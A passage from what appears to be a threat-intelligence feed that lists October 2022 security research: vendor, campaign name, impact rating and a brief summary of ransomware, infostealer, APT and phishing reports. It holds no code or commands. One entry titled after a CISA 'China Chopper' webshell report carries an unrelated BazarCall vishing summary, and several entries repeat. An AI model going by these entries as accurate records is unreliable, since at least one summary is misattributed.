- LOW
- Summary:
- The Lazarus campaign targeted an aerospace company employee in the Netherlands and a political journalist in Belgium. The campaign started with spear phishing emails. These came in the form of fake Amazon emails. The main goal of the attackers was to steal data.
Source:
https://www.welivesecurity.com/deutsch/2022/10/18/lazarus-greift-die-niederlande-und-belgien-an/
—
- Intel Source:
- SafeBreach
- Intel Name:
- New_PowerShell_Backdoor_Fully_Undetectable
- Date of Scan:
- 2022-10-19
- Impact:
- MEDIUM
- Summary:
- Using a novel method of disguising itself as part of the Windows update process, researchers from SafeBreach have detected a new fully undetectable (FUD) PowerShell backdoor.
—
- Intel Source:
- Fortinet
- Intel Name:
- A_Latest_Edition_of_The_New_Royal_Ransomware
- Date of Scan:
- 2022-10-18
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs got a data on a new variant that gaining an interest in the OSINT community. Royal is a reasonably new operation, having been around since at least the start of 2022. The target of this malware is Microsoft Windows platforms and Windows users. The aim is to gain access to a victim’s environment, encrypt their data, and extort a ransom to return access to any files touched.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-royal-ransomware
—
- Intel Source:
- Quick Heal
- Intel Name:
- Diving_Deep_into_New_64_Bit_Emotet_Modules
- Date of Scan:
- 2022-10-18
- Impact:
- LOW
- Summary:
- Researchers from QuickHeal have analyzed the new 64 bit Emotet modules and their differences from the previous cosmetic versions.
Source:
https://blogs.quickheal.com/a-deep-dive-into-new-64-bit-emotet-modules/
—
- Intel Source:
- Symantec
- Intel Name:
- CuckooBees_Campaign_Targeting_Organizations_in_Hong_Kong
- Date of Scan:
- 2022-10-18
- Impact:
- LOW
- Summary:
- According to Symantec researchers, CuckooBee is continuing to target Hong Kong-based organizations. As part of this ongoing campaign, Spyder Loader (Trojan.Spyload) malware was installed on the networks of victims.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Python_Obfuscation_for_Dummies
- Date of Scan:
- 2022-10-18
- Impact:
- LOW
- Summary:
- SANS researchers analyzed several malicious Python scripts with the same appearance and end strings. Due to the obfuscation technique, we are unable to figure out what the script is used for without executing it in a sandbox.
—
- Intel Source:
- STR
- Intel Name:
- Potential_C2_Seeder_Queries_18102022
- Date of Scan:
- 2022-10-18
- Impact:
- MEDIUM
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
https://github.com/str-int-repo/str-seeder-behavior-queries
—
- Intel Source:
- Microsoft
- Intel Name:
- Prestige_Ransomware_Targeting_Organizations_in_Ukraine_and_Poland
- Date of Scan:
- 2022-10-17
- Impact:
- LOW
- Summary:
- Researchers from Microsoft have identified new Prestige ransomware that is being used in attacks aimed at transportation and logistics organizations in Ukraine and Poland.
—
- Intel Source:
- Palo Alto
- Intel Name:
- The_Connection_Between_REvil_and_Ransom_Cartel_Ransomware
- Date of Scan:
- 2022-10-17
- Impact:
- LOW
- Summary:
- Researchers from Palo Alto have done a deep analysis of Ransom Cartel ransomware, as well as our assessment of the possible connections between REvil and Ransom Cartel ransomware.
Source:
https://unit42.paloaltonetworks.com/ransom-cartel-ransomware/?web_view=true
—
- Intel Source:
- VMware
- Intel Name:
- LockBit_3.0_is_in_the_spotlight_again
- Date of Scan:
- 2022-10-17
- Impact:
- MEDIUM
- Summary:
- VMware searchers observed LockBit continues its rise to the top of the ransomware ecosystem and the most leading ransomware strain. It was announced that the builder for the ransomware was leaked by @ali_qushji and available for download from GitHub. This leaked source allows for complete and unhindered analysis, but meaning also that many new groups are emerging, using the same or modified versions of LockBit 3.0 originating from this builder.
Source:
https://blogs.vmware.com/security/2022/10/lockbit-3-0-also-known-as-lockbit-black.html
—
- Intel Source:
- Palo Alto
- Intel Name:
- A_rise_of_threats_from_newly_observed_domains
- Date of Scan:
- 2022-10-17
- Impact:
- LOW
- Summary:
- Last year, Palo Alto Networks created a proactive detector which recognized malicious domains at that time and identifyed them before they are starting their malicious activities. At Palo Alto Networks detector extract NODs from passive DNS and proactively detect potential cybercriminal activities among them. The system scans and discovered newly registered domains (NRDs) and detected their potential network abuses.
Source:
https://unit42.paloaltonetworks.com/malicious-newly-observed-domains/
—
- Intel Source:
- Splunk
- Intel Name:
- A_new_adversary_simulation_tool_Brute_Ratel_C4_(BRC4)
- Date of Scan:
- 2022-10-17
- Impact:
- LOW
- Summary:
- The Splunk Threat Research Team (STRT) shared their reserach with the capture of Brute Ratel Badgers (agents) to create a Yara rule and help to identify more on VirusTotal. Brute Ratel tool is growing in the ranks of popularity among red teamers and most recently adversaries. Plus, the reserachers reversed a sample to understand its functions and analyzed it to help defenders identify behaviors related to Brute Ratel.
—
- Intel Source:
- AT&T
- Intel Name:
- SocGholish_Drive_by_Compromise
- Date of Scan:
- 2022-10-17
- Impact:
- LOW
- Summary:
- AT&T researchers have analyzed an alert related to SocGholish that is providing fake software updates.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- COVID_Phishing_Campaign
- Date of Scan:
- 2022-10-17
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed phishing emails about Covid for all suppliers to declare their vaccination status, but the date is almost 1 year old.
—
- Intel Source:
- Cloudsek
- Intel Name:
- Diving_Deep_into_BlueSky_Ransomware
- Date of Scan:
- 2022-10-17
- Impact:
- LOW
- Summary:
- CloudSEK researchers have done a deep analysis of BlueSky Ransomware that covers the technical aspects: Procedure for privilege escalation, Persistence, Encryption mechanism, and Evasion techniques.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- A_new_Powershell_script_dropps_a_malware
- Date of Scan:
- 2022-10-17
- Impact:
- LOW
- Summary:
- Researchers from SANS have hunted and found a malicious Powershell script that drops a malware on the victim’s computer. It is not new one. It is called “autopowershell.ps1”. This malware tries to reduce at the minimum interactions with the file system. But, to achieve persistence, it must write something on the disk. Most of the time, it’s done through registry keys.
Source:
https://isc.sans.edu/diary/Fileless+Powershell+Dropper/29156/
—
- Intel Source:
- Wordsfence
- Intel Name:
- A_critical_authentication_bypass_vulnerability_CVE_2022_40684
- Date of Scan:
- 2022-10-14
- Impact:
- High
- Summary:
- Wordfence Threat Intelligence team recorded today several exploit attempts and requests originating from the malicious IP addresses. This exploit attempts targeting CVE-2022-40684 on network. CVE-2022-40684 is a critical authentication bypass vulnerability in the administrative interface of Fortinet’s FortiGate firewalls, FortiProxy web proxies, and FortiSwitch Manager, and is being actively exploited in the wild.
—
- Intel Source:
- Zscaler
- Intel Name:
- Ducktail_infostealer_came_back_again
- Date of Scan:
- 2022-10-14
- Impact:
- LOW
- Summary:
- The Zscaler ThreatLabz research team has come across an new campaign of Ducktail Infostealer with a new PHP version which is vigorously being distributed by mimicking to be a free/cracked application installer for a variety of applications including games, Microsoft Office applications, Telegram, and others.
—
- Intel Source:
- Cyble
- Intel Name:
- InfoStealer_Spreading_via_AnyDesk_Phishing_Site
- Date of Scan:
- 2022-10-14
- Impact:
- LOW
- Summary:
- Researchers from Cyble have identified a phishing site, that is impersonating a genuine AnyDesk website. The initial infection starts when the user clicks on the “Downloads” button present in the phishing site, which downloads a malware named “Anydesk.exe” file from the remote server.
Source:
https://blog.cyble.com/2022/10/13/mitsu-stealer-distributed-via-anydesk-phishing-site/
—
- Intel Source:
- Blackberry
- Intel Name:
- BianLian_Ransomware_encrypts_withan_immediate_speed
- Date of Scan:
- 2022-10-14
- Impact:
- MEDIUM
- Summary:
- The reserachers from Cyble observed BianLian ransomware raises the severity level of encrypting files with exceptional speed. Threat actors created the new BianLian ransomware version in the Go programming language (aka Golang) for a variety of reasons, particularly its robust support for concurrency which gives them the ability for various malicious functions to run independently of each other, which speeds up attack.
Source:
https://blogs.blackberry.com/en/2022/10/bianlian-ransomware-encrypts-files-in-the-blink-of-an-eye
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Deep_Analysis_of_QBot_HTML_File
- Date of Scan:
- 2022-10-14
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed a malicious QBot HTML file that contains BASE64 images with malware.
Source:
https://isc.sans.edu/diary/Analysis+of+a+Malicious+HTML+File+QBot/29146/
—
- Intel Source:
- Uptycs
- Intel Name:
- AgentTesla_Malware_Distributing_via_WSHRAT_Malware
- Date of Scan:
- 2022-10-14
- Impact:
- LOW
- Summary:
- Uptycs researchers have identified a new Agent Tesla malware attack campaign and observed that the threat actors are now trying to drop Agent Tesla malware via WSHRAT malware.
Source:
https://www.uptycs.com/blog/wshrat-acting-as-a-dropper-for-agent-tesla
—
- Intel Source:
- Palo Alto
- Intel Name:
- Ransom_Cartel_ransomware_performance_overlaps_with_REvil_ransomware
- Date of Scan:
- 2022-10-14
- Impact:
- MEDIUM
- Summary:
- Palo Alto shared their analysis of Ransom Cartel ransomware. Unit 42 has observed Ransom Cartel encrypting both Windows and Linux VMWare ESXi servers in attacks on corporate networks. Ransom Cartel uses double extortion and some of the same TTPs were observed during ransomware attacks, this type of ransomware uses less common tools – DonPAPI.
Source:
https://unit42.paloaltonetworks.com/ransom-cartel-ransomware/
—
- Intel Source:
- Cyfirma
- Intel Name:
- Prynt_malware_injection_techniques
- Date of Scan:
- 2022-10-14
- Impact:
- LOW
- Summary:
- CYFIRMA Research team analysed an infostealer “Prynt” sample and that sample was found to be written in C/C++ and is a 32-bit console binary. Infostealer “Prynt” has the capability to steal system information from infected systems, which includes files from the targeted directories and credentials from web browsers.
—
- Intel Source:
- Crowdstrike
- Intel Name:
- The_examination_of_Wiper_Malware_Part_4
- Date of Scan:
- 2022-10-14
- Impact:
- MEDIUM
- Summary:
- Researchers from CrowdStrike have covered some of the rarely used “helper” techniques implemented by wipers, which achieve secondary goals or facilitate a smaller portion of the wiping process.
Source:
https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-4/
—
- Intel Source:
- Cyble
- Intel Name:
- A_spreading_of_RedLine_Stealer
- Date of Scan:
- 2022-10-14
- Impact:
- Medium
- Summary:
- Cyble Research team uncovered a phishing site that pretended like a genuine “Convertio” online tool website that converts files into different file formats, including documents, images, spreadsheets, eBooks, archives, presentations, audio, video, etc. The phishing website is well-designed and appears similar to the legitimate Convertio website.
Source:
https://blog.cyble.com/2022/10/14/online-file-converter-phishing-page-spreads-redline-stealer/
—
- Intel Source:
- Cisco Talos
- Intel Name:
- New_Attack_Technique_Leveraging_Alchimist_and_Insekt_Malware
- Date of Scan:
- 2022-10-13
- Impact:
- MEDIUM
- Summary:
- Researchers from Cisco have discovered a new attack framework, including a command and control (C2) tool called “Alchimist” and a new malware “Insekt” written in GoLang targetting windows, Mac, and Linux in the wild.
Source:
https://blog.talosintelligence.com/2022/10/alchimist-offensive-framework.html
—
- Intel Source:
- SentinelOne
- Intel Name:
- WIP19_Group_Targeting_Telecommunication_and_IT_Industries
- Date of Scan:
- 2022-10-13
- Impact:
- LOW
- Summary:
- SentinelOne researchers have tracked a new Chinese-speaking threat group known as WIP19 that is targeting telecommunications and IT service providers in the Middle East and Asia.
—
- Intel Source:
- ASEC
- Intel Name:
- Various_malicious_remote_control_tools
- Date of Scan:
- 2022-10-13
- Impact:
- LOW
- Summary:
- Researchers from ASEC have identified various malicious remote control tools that are generally used by various users are used. This allows attackers to bypass the security product’s diagnosis and take control of the infected system in a GUI environment.
—
- Intel Source:
- SentinelOne
- Intel Name:
- 8220_Gang_continues_to_target_misconfigured_cloud_workloads
- Date of Scan:
- 2022-10-13
- Impact:
- MEDIUM
- Summary:
- SentinelOne noted that 8220 Gang had expanded its cloud service botnet and the group has rotated its attack infrastructure and continued to absorb compromised hosts into its botnet and to distribute cryptocurrency mining malware. 8220 Gang identifies targets via scanning for misconfigured or vulnerable hosts on the public internet.
Source:
https://www.sentinelone.com/blog/8220-gang-cloud-botnet-targets-misconfigured-cloud-workloads/
—
- Intel Source:
- Symantec
- Intel Name:
- Budworm_Hackers_Targeting_US_Organization
- Date of Scan:
- 2022-10-13
- Impact:
- LOW
- Summary:
- Researchers from Symantec Threat Hunter team have identified APT group named Budworm targeting an unnamed U.S. state legislature for the first time.
Source:
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/budworm-espionage-us-state
—
- Intel Source:
- ASEC
- Intel Name:
- GuLoader_malware_disguised_as_Word
- Date of Scan:
- 2022-10-13
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered that the GuLoader malware is being distributed to domestic corporate users.
—
- Intel Source:
- HP Threat Research
- Intel Name:
- Magniber_Ransomware_continues_targeting_Home_Users_with_Fake_Software_Updates
- Date of Scan:
- 2022-10-13
- Impact:
- MEDIUM
- Summary:
- Researchers from HP shared their analysis of a Magniber ransomware campaign that was going since September and targeted home users by masquerading as software updates. The attackers used the evade detection techniques, such as running the ransomware in memory, bypassing User Account Control (UAC) in Windows, and bypassing detection techniques.
—
- Intel Source:
- Cyble
- Intel Name:
- A_new_ongoing_tech_support_scam
- Date of Scan:
- 2022-10-13
- Impact:
- LOW
- Summary:
- Cyble Research & Intelligence Labs reserachers identified a new ongoing tech support scam where the Threat Actor has developed various phishing websites that impersonated to be part of of Microsoft support sites that show a fake Windows defender alert.
Source:
https://blog.cyble.com/2022/10/11/massive-tech-support-scam-exposed/
—
- Intel Source:
- ASEC
- Intel Name:
- Top_malware_statistics_for_last_two_weeks
- Date of Scan:
- 2022-10-13
- Impact:
- MEDIUM
- Summary:
- The ASEC team did the analyse and collected statistics about Top 5 malwares from September 26th, 2022 (Monday) to October 2nd, 2022 (Sunday).
—
- Intel Source:
- ASEC
- Intel Name:
- GlobeImposter_Ransomware_Targeting_Vulnerable_MS_SQL_Servers
- Date of Scan:
- 2022-10-12
- Impact:
- LOW
- Summary:
- Researchers from ASEC have identified that the GlobeImposter ransomware, which targets vulnerable MS-SQL servers, is being distributed in Korea.
—
- Intel Source:
- ASEC
- Intel Name:
- Qakbot_Distribution_Method_Changed_from_Excel_Macro_to_ISO_Files
- Date of Scan:
- 2022-10-12
- Impact:
- LOW
- Summary:
- ASEC researchers have identified that Qakbot, an online banking malware, has changed its distribution method from Excel 4.0 Macro to ISO files.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Black_Basta_Ransomware_Using_QAKBOT_Brute_Ratel_and_Cobalt_Strike
- Date of Scan:
- 2022-10-12
- Impact:
- MEDIUM
- Summary:
- Researchers from Trendmicro have analyzed QAKBOT related cases that is leading to a Brute Ratel C4 and Cobalt Strike payload and that can be attributed to the threat actors behind the Black Basta ransomware.
—
- Intel Source:
- ASEC
- Intel Name:
- Lazarus_Group_Leveraging_DLL_Side-Loading_Technique
- Date of Scan:
- 2022-10-12
- Impact:
- MEDIUM
- Summary:
- ASEC researchers have discovered that the Lazarus group hackers using the DLL Side-Loading attack technique (T1574.002) by abusing legitimate applications in the initial compromise stage to achieve the next stage of their attack process.
—
- Intel Source:
- Fortinet
- Intel Name:
- MS_Excel_File_Delivering_Multi_Stage_Cobalt_Strike_Loader
- Date of Scan:
- 2022-10-12
- Impact:
- LOW
- Summary:
- FortiGuard Labs researchers have discovered a malicious Excel document masquerading as a salary calculation tool for Ukrainian troops. It executes evasive multi-stage loaders, eventually resulting in the victim’s device being infected with Cobalt Strike Beacon malware.
—
- Intel Source:
- Mandiant
- Intel Name:
- Caffeine_Service_Allows_Anyone_Launch_Microsoft_365_Phishing_Attacks
- Date of Scan:
- 2022-10-12
- Impact:
- LOW
- Summary:
- Researchers from Mandiant have discovered and tested the phishing-as-a-service (PhaaS) platform named ‘Caffeine’ service thoroughly. Post investigation, a large-scale phishing campaign ran through the service, targeting one of Mandiant’s clients to steal Microsoft 365 account credentials.
Source:
https://www.mandiant.com/resources/blog/caffeine-phishing-service-platform
—
- Intel Source:
- TrendMicro
- Intel Name:
- A_Detailed_Analysis_of_Malicious_Tools_Used_by_Cyber_Espionage_Group_Earth_Aughisky
- Date of Scan:
- 2022-10-11
- Impact:
- LOW
- Summary:
- Trendmicro researchers have analyzed the Earth Aughisky threat group and tools with components that have yet to be identified, reported, or attributed to the group. The group is known for its ability to abuse legitimate accounts, software, applications, and other weaknesses in the network design and infrastructure for its own ends.
Source:
https://www.trendmicro.com/en_us/research/22/j/tracking-earth-aughiskys-malware-and-changes.html
—
- Intel Source:
- Mandiant
- Intel Name:
- Caffeine_Service_Allows_Anyone_Launch_Microsoft_365_Phishing_Attacks
- Date of Scan:
- 2022-10-11
- Impact:
- LOW
- Summary:
- Researchers from Mandiant have discovered and tested the phishing-as-a-service (PhaaS) platform named ‘Caffeine’ service thoroughly. Post investigation, a large-scale phishing campaign ran through the service, targeting one of Mandiant’s clients to steal Microsoft 365 account credentials.
Source:
https://www.mandiant.com/resources/blog/caffeine-phishing-service-platform
—
- Intel Source:
- VMware
- Intel Name:
- Emotet_Malware_Using_Evasion_Techniques_in_Recent_Attacks
- Date of Scan:
- 2022-10-11
- Impact:
- LOW
- Summary:
- Researchers from VMware have analyzed the Threat actors associated with the notorious Emotet malware and are continually shifting their tactics and command-and-control (C2) infrastructure to escape detection.
—
- Intel Source:
- X-Junior
- Intel Name:
- TheSnakeKeyloggermalwareanalyses
- Date of Scan:
- 2022-10-11
- Impact:
- LOW
- Summary:
- The researcher from X-Junior provided his deep analyses in his post about Snake Keylogger. Snake Keylogger is a malware developed using .NET anf its pupose is on stealing sensitive information from a victim’s device, saved credentials, the victim’s keystrokes, screenshots of the victim’s screen, and clipboard data.
Source:
https://x-junior.github.io/malware%20analysis/2022/06/24/Snakekeylogger.html#introduction
—
- Intel Source:
- WeliveSecurity
- Intel Name:
- POLONIUM_threat_group_attacks_on_Israel_continue
- Date of Scan:
- 2022-10-11
- Impact:
- LOW
- Summary:
- ESET researchers shared their findings about POLONIUM, APT group which initial compromise vector is unknown. According to ESET telemetry, POLONIUM has custom backdoors and cyberespionage tools targeted more than a dozen organizations in Israel include engineering, information technology, law, communications, branding and marketing, media, insurance, and social services.
Source:
https://www.welivesecurity.com/2022/10/11/polonium-targets-israel-creepy-malware/
—
- Intel Source:
- Inquest
- Intel Name:
- A_close_look_at_an_item_called_CustomXMLParts
- Date of Scan:
- 2022-10-10
- Impact:
- LOW
- Summary:
- In this post the reseracher covered an item called “CustomXMLParts”. It is an XML container to store arbitrary data to be used in the document. The intention for it appears to give the developer a way to change the formatting of the Office document that is not already available or add additional functionality.
—
- Intel Source:
- CISA
- Intel Name:
- CISA_Malware_Analysis_Report:_HyperBro
- Date of Scan:
- 2022-10-10
- Impact:
- MEDIUM
- Summary:
- Researchers at CISA gathered malware samples from live incident responses loaded with HyperBro, a Remote Access trojan enabling attackers to a backdoor.
Source:
https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-277b
—
- Intel Source:
- Cyble
- Intel Name:
- Modified_FiveM_Spoofer_activity
- Date of Scan:
- 2022-10-10
- Impact:
- LOW
- Summary:
- Cyble Researchers has continuously monitored phishing campaigns that distribute different malware families and recently, they identified a malicious site which redirects the user to a discord channel where the announcement is made by the Threat Actor for selling the spoofer to get unban from FiveM. The FiveM is the mod project that allows gamers to play Grand Theft Auto V (GTA5) with custom multiplayer modes on customized dedicated servers.
Source:
https://blog.cyble.com/2022/10/07/modified-fivem-spoofer-targeting-gamers/
—
- Intel Source:
- Chexmax
- Intel Name:
- The_installations_of_the_malicious_NPM_packages_by_“LofyGang”_group
- Date of Scan:
- 2022-10-10
- Impact:
- LOW
- Summary:
- Checkmarx discovered around 200 malicious NPM packages with thousands of installations linked to an attack group called “LofyGang”. This attack has been acting for over a year with multiple goals like getting credit card information, streaming services accounts (e.g. Disney+), Minecraft accounts, and more, discord “Nitro” (premium) upgrades.
—
- Intel Source:
- Team-cymru
- Intel Name:
- IcedID_campaign_metrics
- Date of Scan:
- 2022-10-10
- Impact:
- LOW
- Summary:
- Team Cymru researchers put together details metrics on the curtain on IcedID campaign metrics and Stage 1 C2 infrastructure, to shed light on behaviors and details not often available. These metrics are numbers the threat actors are watching as well, and just like any other business may influence their future actions.
Source:
https://www.team-cymru.com/post/a-visualizza-into-recent-icedid-campaigns
—
- Intel Source:
- Rewterz
- Intel Name:
- LockBit_3.0_Ransomware_Spreads_again
- Date of Scan:
- 2022-10-10
- Impact:
- MEDIUM
- Summary:
- Researchers discovered that LockBit 3.0 ransomware is being delivered in Word document format while masquerading as job application emails in NSIS format. The particular distribution method has not yet been discovered, but given that the file names include people’s names, such as ‘Lim Gyu Min.docx’ or ‘Jeon Chae Rin.docx,’ it is possible that they were spread disguised as job applications, as in previous occurrences.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Another_look_at_recent_IcedID_campaigns
- Date of Scan:
- 2022-10-10
- Impact:
- LOW
- Summary:
- Researcher from ISAC had another look at recent IcedID campaigns using PNG files to hide their malicious payload.
—
- Intel Source:
- CISA
- Intel Name:
- The_”China_Chopper”_webshells_deailed_malware_report
- Date of Scan:
- 2022-10-10
- Impact:
- LOW
- Summary:
- The BazarCall campaigns were found to be most active in United States and Canada. BazarCall campaigns forgo malicious links or attachments in email messages in favor of phone numbers that recipients are misled into calling. It’s a technique reminiscent of vishing and tech support scams where potential victims are being cold called by the attacker, except in BazarCall’s case, targeted users must dial the number.
—
- Intel Source:
- CISA
- Intel Name:
- CISA_Malware_Analysis_Report_HyperBro
- Date of Scan:
- 2022-10-10
- Impact:
- MEDIUM
- Summary:
- Researchers at CISA gathered malware samples from live incident responses loaded with HyperBro, a Remote Access trojan enabling attackers to a backdoor.
Source:
https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-277b
—
- Intel Source:
- CISA
- Intel Name:
- CISA_Malware_Analysis_Report_CovalentStealer
- Date of Scan:
- 2022-10-10
- Impact:
- MEDIUM
- Summary:
- Researchers at CISA gathered malware samples from live incident responses loaded with CovalentStealer, which is designed to identify and exfiltrate files to a remote server.
Source:
https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-277a
—
- Intel Source:
- Fortinet
- Intel Name:
- Hackers_Exploiting_CVE_2017_11882_and_Delivering_Multiple_Malware
- Date of Scan:
- 2022-10-07
- Impact:
- LOW
- Summary:
- Researchers at FortiGuard have found a malicious file embedded in an Excel document. Embedded files with randomized file names exploit vulnerability CVE-2017-11882 to execute malicious code that delivers and executes malware on victims’ devices.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Domain_Generation_Algorithm_tactic_used_by_malware
- Date of Scan:
- 2022-10-07
- Impact:
- LOW
- Summary:
- Researcher from ISAC discovered a simple malicious PowerShell script that implements a backdoor with DGA capability. (“Domain Generation Algorithm”) is a popular tactic used by malware to make connections with their C2 more stealthy and difficult to block. The idea is to generate domain names periodically and use them during the defined period.
Source:
https://isc.sans.edu/diary/Powershell+Backdoor+with+DGA+Capability/29122/
—
- Intel Source:
- Medium
- Intel Name:
- A_novel_backdoor_malware_targeting_Microsoft_SQL_servers
- Date of Scan:
- 2022-10-07
- Impact:
- LOW
- Summary:
- DCSO CyTec recently found a novel backdoor malware targeting Microsoft SQL servers. The malware comes in form of an “Extended Stored Procedure” DLL, a special type of extension used by Microsoft SQL servers. Once loaded into a server by an attacker, it is controlled solely using SQL queries.
Source:
https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01
—
- Intel Source:
- Trellix
- Intel Name:
- BazarCall_social_engineering_tactics
- Date of Scan:
- 2022-10-07
- Impact:
- LOW
- Summary:
- The BazarCall campaigns were found to be most active in United States and Canada. BazarCall campaigns forgo malicious links or attachments in email messages in favor of phone numbers that recipients are misled into calling. It’s a technique reminiscent of vishing and tech support scams where potential victims are being cold called by the attacker, except in BazarCall’s case, targeted users must dial the number.
—
- Intel Source:
- Cyble
- Intel Name:
- Fake_Ransomware_Spreading_via_Phishing_Emails
- Date of Scan:
- 2022-10-07
- Impact:
- LOW
- Summary:
- Researchers from Cyble have identified a website that is distributing a fake ransomware executable. Instead of encrypting files, the Fake Ransomware changes file names and extensions, drops ransom notes, and threatens victims to pay a ransom as usual.
Source:
https://blog.cyble.com/2022/10/06/fake-ransomware-infection-under-widespread/
—
- Intel Source:
- SpiderLabs
- Intel Name:
- Phishers_Using_HTML_Attachments_to_Steal_Sensitive_Information
- Date of Scan:
- 2022-10-07
- Impact:
- LOW
- Summary:
- According to Trustwave SpiderLabs, HTML file attachments have become a common occurrence in spam traps. As phishing spam is often a vehicle for malware delivery, this is not uncommon.
—
- Intel Source:
- BlackBerry
- Intel Name:
- Mustang_Panda_APT_Group_Leveraging_PlugX_Malware_Family
- Date of Scan:
- 2022-10-07
- Impact:
- LOW
- Summary:
- Researchers from BlackBerry have discovered a campaign by an APT group called Mustang Panda that is leveraging the PlugX malware family to target the Southeast Asian state of Myanmar.
—
- Intel Source:
- Fortinet
- Intel Name:
- Phishing_Campaigns_in_Q3_Delivering_Malware
- Date of Scan:
- 2022-10-06
- Impact:
- MEDIUM
- Summary:
- Researchers from Fortinet have elaborated on multiple phishing campaigns in Q3 delivering malware, targetting windows users.
Source:
https://www.fortinet.com/blog/threat-research/delivery-of-malware-phishing-campaigns-in-q3-2022
—
- Intel Source:
- BitSight
- Intel Name:
- A_Deep_Examination_of_PseudoManuscrypt_Malware
- Date of Scan:
- 2022-10-06
- Impact:
- LOW
- Summary:
- The BitSight researchers have analyzed PseudoManuscrypt malware. They describe how researchers went from unknown DGA-like domains to sinkholes and mimicked a relatively recent botnet that has infected nearly 500,000 machines (2.2M unique IP addresses) across at least 40 countries in the last 8 months, and has an estimated botnet size of around 50,000 machines.
Source:
https://www.bitsight.com/blog/zero-50k-infections-pseudomanuscrypt-sinkholing-part-1
—
- Intel Source:
- BitDefender
- Intel Name:
- DLL_Side_Loading_Attack_Leveraging_OneDrive_Application
- Date of Scan:
- 2022-10-06
- Impact:
- LOW
- Summary:
- Researchers from BitDefender have identified and documented a cryptojacking campaign exploiting known DLL sideloading vulnerabilities in Microsoft OneDrive.
—
- Intel Source:
- Zscaler
- Intel Name:
- Diving_Deep_into_LilithBot_Malware
- Date of Scan:
- 2022-10-06
- Impact:
- LOW
- Summary:
- Zscaler researchers have discovered a sample of multi-function malware called “LilithBot” which is associated with the Eternity threat group (a.k.a. EternityTeam; Eternity Project), linked to the Russian “Jester Group,” that has been active since at least January 2022.
—
- Intel Source:
- DCSO CyTec Blog
- Intel Name:
- Over_250_Microsoft_SQL_Servers_Infected_By_New_Maggie_Malware
- Date of Scan:
- 2022-10-06
- Impact:
- MEDIUM
- Summary:
- DCSO CyTec researchers have identified a new malware, named Maggie, that has already infected over 250 Microsoft SQL servers worldwide. Most of the infected instances are in South Korea, India, Vietnam, China, Russia, Thailand, Germany, and the United States.
Source:
https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01
—
- Intel Source:
- Securelist
- Intel Name:
- The_OnionPoison_malicious_campaign
- Date of Scan:
- 2022-10-05
- Impact:
- LOW
- Summary:
- Securelist researchers discovered multiple downloads of previously unclustered malicious Tor Browser installers. According to their measuremant, all the victims targeted by these installers are located in China.
Source:
https://securelist.com/onionpoison-infected-tor-browser-installer-youtube/107627/
—
- Intel Source:
- Crowdstrike
- Intel Name:
- Hackers_using_Comm100_Desktop_Agent_App_to_Spread_Malware
- Date of Scan:
- 2022-10-05
- Impact:
- LOW
- Summary:
- Researchers from CrowdStrike have identified a new supply chain attack that involves the use of a trojanized installer for the Comm100 Live Chat application to distribute a JavaScript backdoor.
Source:
https://www.crowdstrike.com/blog/new-supply-chain-attack-leverages-comm100-chat-installer/
—
- Intel Source:
- Cofense
- Intel Name:
- The_utilize_of_Wufoo_phishing_scams
- Date of Scan:
- 2022-10-05
- Impact:
- LOW
- Summary:
- The Cofense Phishing Defence Center recently observed the phishing scams that utilize the online form builder Wufoo, a tool commonly associated with easily created surveys and online registration forms. Threat actors have used Wufoo to create simplistic but effective credential stealing vectors.
Source:
https://cofense.com/blog/scammers-utilize-wufoo-for-vacation-request-phish
—
- Intel Source:
- Sophos
- Intel Name:
- BlackByte_Malware_returns_with_new_tactics
- Date of Scan:
- 2022-10-05
- Impact:
- LOW
- Summary:
- Researchers from Sophos uncovered BlackByte with new tactics to bypass security products by leveraging the RTCore64.sys vulnerability.
Source:
https://news.sophos.com/en-us/2022/10/04/blackbyte-ransomware-returns/
—
- Intel Source:
- Avast
- Intel Name:
- A_MafiaWare666_ransomware_decryption_tool
- Date of Scan:
- 2022-10-05
- Impact:
- LOW
- Summary:
- Avast researchers release a MafiaWare666 ransomware decryption tool. They discovered a vulnerability in the encryption schema that allows some of the variants to be decrypted without paying the ransom. New or previously unknown samples may encrypt files differently, so they may not be decryptable without further analysis. MafiaWare666 is also known as JCrypt, RIP Lmao, BrutusptCrypt or Hades.
Source:
https://decoded.avast.io/threatresearch/decrypted-mafiaware666-ransomware/
—
- Intel Source:
- ASEC
- Intel Name:
- Magniber_Ransomware_file_extension_changed_from_js_to_wsf
- Date of Scan:
- 2022-10-05
- Impact:
- LOW
- Summary:
- Researchers from ASEC have analyzed the Magniber ransomware script in the WSF format, changing the extension from *.js to *.wsf.
—
- Intel Source:
- eSentire
- Intel Name:
- Highly_evasive_SolarMarker_malware_activity
- Date of Scan:
- 2022-10-05
- Impact:
- LOW
- Summary:
- Researchers from eSentire have observed a spike in drive-by download malware campaigns delivering SolarMarker disguised as document templates.
Source:
https://www.esentire.com/security-advisories/solarmarker-malware-activity
—
- Intel Source:
- Citizenlab
- Intel Name:
- New_Pegasus_Spyware_Abuses
- Date of Scan:
- 2022-10-04
- Impact:
- LOW
- Summary:
- Researchers from Mexican digital rights organization R3D have identified Pegasus infections against journalists and a human rights defender and Citizen Lab provided technical support for R3D’s analysis and validated the infections.
Source:
https://citizenlab.ca/2022/10/new-pegasus-spyware-abuses-identified-in-mexico/
—
- Intel Source:
- Fortinet
- Intel Name:
- Hackers_using_Microsoft_Office_Documents_to_Deliver_Agent_Tesla_and_njRat
- Date of Scan:
- 2022-10-04
- Impact:
- LOW
- Summary:
